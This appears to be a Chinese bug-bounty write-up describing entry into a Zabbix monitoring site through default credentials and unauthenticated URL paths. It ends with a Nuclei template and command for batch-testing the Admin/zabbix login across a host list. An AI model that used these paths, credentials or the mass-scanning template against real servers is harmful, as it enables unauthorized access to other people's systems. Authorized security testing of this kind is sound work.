找到一个某src的子站,通过信息收集插件,发现ZABBIX-监控系统,可以日一下


使用谷歌搜索历史漏洞:zabbix漏洞

 通过目录扫描扫描到后台,谷歌搜索一下有没有默认弱口令

  

 成功进去了,挖洞就是这么简单


搜索文章还报过未授权访问漏洞,打一波
- /overview.php?ddreset=1
- /srv_status.php?ddreset=1
- /latest.php?ddreset=1
- /zabbix.php?action=problem.view&ddreset=1


 又成功进去了,已经清除缓存在拼接路径的,进去成功寻找功能点,在搜索位置输入任何东西,前端页面就会显示什么,猜测可能存在反射xss,但没什么用,继续测试ssti注入


 不存在,这个站还可以getshell,但是点到位置,后台进去了,人也进去了
 黑盒测试ssti注入这个工具推荐一下,用这个工具还挖出过几个洞,这个感觉已经是公开最好的工具了:GitHub - vladko312/SSTImap: Automatic SSTI detection tool with interactive interface

顺便写了一个nuclei批量默认密码验证脚本
【Nuclei-Poc】
- id: zabbix-default-credential-check
- info:
- name: Zabbix Default Credential Check
- author:
- severity: high
- description: Check for default credentials in Zabbix.
- tags: zabbix,default,cred
- requests:
- - method: POST
- path:
- - "{{BaseURL}}/zabbix/index.php"
- body: |
- name=Admin&password=zabbix&autologin=1&enter=Sign+in
- headers:
- Content-Type: application/x-www-form-urlencoded
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- Accept-Encoding: gzip, deflate
- Connection: close
- Upgrade-Insecure-Requests: 1
- Origin: "{{BaseURL}}"
- Referer: "{{BaseURL}}/zabbix/"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Location: zabbix.php?action=dashboard.view"
- part: header
- - type: status
- status:
- - 302
【验证】
.\nuclei -l xx.txt -t xx.yaml

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。







![[推荐]有安全一点的网贷大数据信用查询网站吗?](https://img-blog.csdnimg.cn/img_convert/8454052fda4b0bc21fe93f9447af04e5.png)











